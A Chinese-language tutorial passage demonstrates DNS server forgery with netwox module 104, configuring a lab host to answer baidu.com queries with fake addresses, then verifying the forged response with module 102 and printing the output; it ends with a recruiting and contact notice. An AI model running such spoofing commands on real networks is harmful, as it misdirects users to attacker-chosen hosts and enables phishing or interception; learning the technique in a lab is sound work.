【1.8.6.3】伪造DNS服务器

DNS 服务器是进行域名和与之相对应的 IP 地址转换的服务器。正常情况下,用户访问域名网站,首先从 DNS 服务器上或权威名称服务器上获取域名对应的 IP 地址,然后根据该 IP 地址访问网站。

为了能够使用户混淆,netwox 工具提供了编号为 104 的模块。它可以伪造 DNS 服务器,手动设置假的域名与 IP 地址的对应关系。这样,用户会获取一个域名对应的错误 IP 地址。

【实例】在主机 192.168.59.133 上伪造域名 baidu.com 的 DNS 服务器。

  1. 伪造域名 baidu.com 的 DNS 服务器,伪造该域名对应的 IP 地址为 110.111.112.113,该域名的权威名称服务器为 123.baidu.com,对应的 IP 地址为 56.67.78.89。

执行命令如下:

root@daxueba:~# netwox 104 -h baidu.com -H 110.111.112.113 -a 123.baidu.com -A 56.67.78.89

执行命令后将成功伪造域名 baidu.com 的 DNS 服务器,当有用户向该服务器请求域名 baidu.com 对应的 IP 地址时,将会给出伪造的地址。

  1. 这时,使用 netwox 工具中编号为 102 的模块,请求域名 baidu.com 对应的IP地址,执行命令如下:

    root@daxueba:~# netwox 102 -i 192.168.59.133 -n baidu.com -y a

执行命令后,将从伪造的 DNS 服务器(地址为 192.168.59.133)上获取对应的 IP 地址、权威服务器以及对应的 IP 地址信息。

获取到的信息如下:

DNS_question_________________________________________________.      #DNS请求
| id=29841  rcode=OK             opcode=QUERY                        |
| aa=0 tr=0 rd=0 ra=0  quest=1  answer=0  auth=0  add=0              |
| baidu.com. A                                                       |
|__________________________________________________________          |
DNS_answer________________________________________________.         #DNS响应
| id=29841  rcode=OK             opcode=QUERY                        |
| aa=1 tr=0 rd=0 ra=0  quest=1  answer=1  auth=1  add=1              |
| baidu.com. A                                                       |
| baidu.com. A 10 110.111.112.113                                    |
#域名对应的IP地址
| 123.baidu.com. NS 10 123.baidu.com.                                | 
#权威服务器名称
| 123.baidu.com. A 10 56.67.78.89                                    |      
#权威服务器IP地址
|_____________________________________________________________       |

从输出信息可以看到,获取到的域名 baidu.com 对应的 IP 地址为伪造的地址 110.111.112.113,该域名的权威服务器也是伪造的服务器 123.baidu.com,对应的 IP 地址为 56.67.78.89。

参考资料

药企,独角兽,苏州。团队长期招人,感兴趣的都可以发邮件聊聊:tiehan@sina.cn
个人公众号,比较懒,很少更新,可以在上面提问题,如果回复不及时,可发邮件给我: tiehan@sina.cn